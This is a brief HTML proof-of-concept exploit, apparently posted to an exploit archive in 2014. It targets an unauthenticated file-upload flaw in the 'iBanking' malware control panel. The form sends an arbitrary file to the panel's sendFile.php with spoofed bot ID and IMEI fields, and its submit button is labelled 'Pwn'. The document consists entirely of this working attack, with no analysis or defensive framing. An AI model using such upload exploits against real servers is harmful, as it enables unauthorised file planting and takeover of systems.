<!-- iBanking panel upload vulnerability -->
<form method="POST" action="http://localhost/smsbot/sendFile.php" enctype="multipart/form-data">
FiLEZ: <input type="file" name="uploadedfile" /><br />
<input type="hidden" name="bot_id" value="500" />
<input type="hidden" name="imei" value="000000000000000" />
<input type="submit" value="Pwn" />
</form>b

# siph0n [2014-11-26]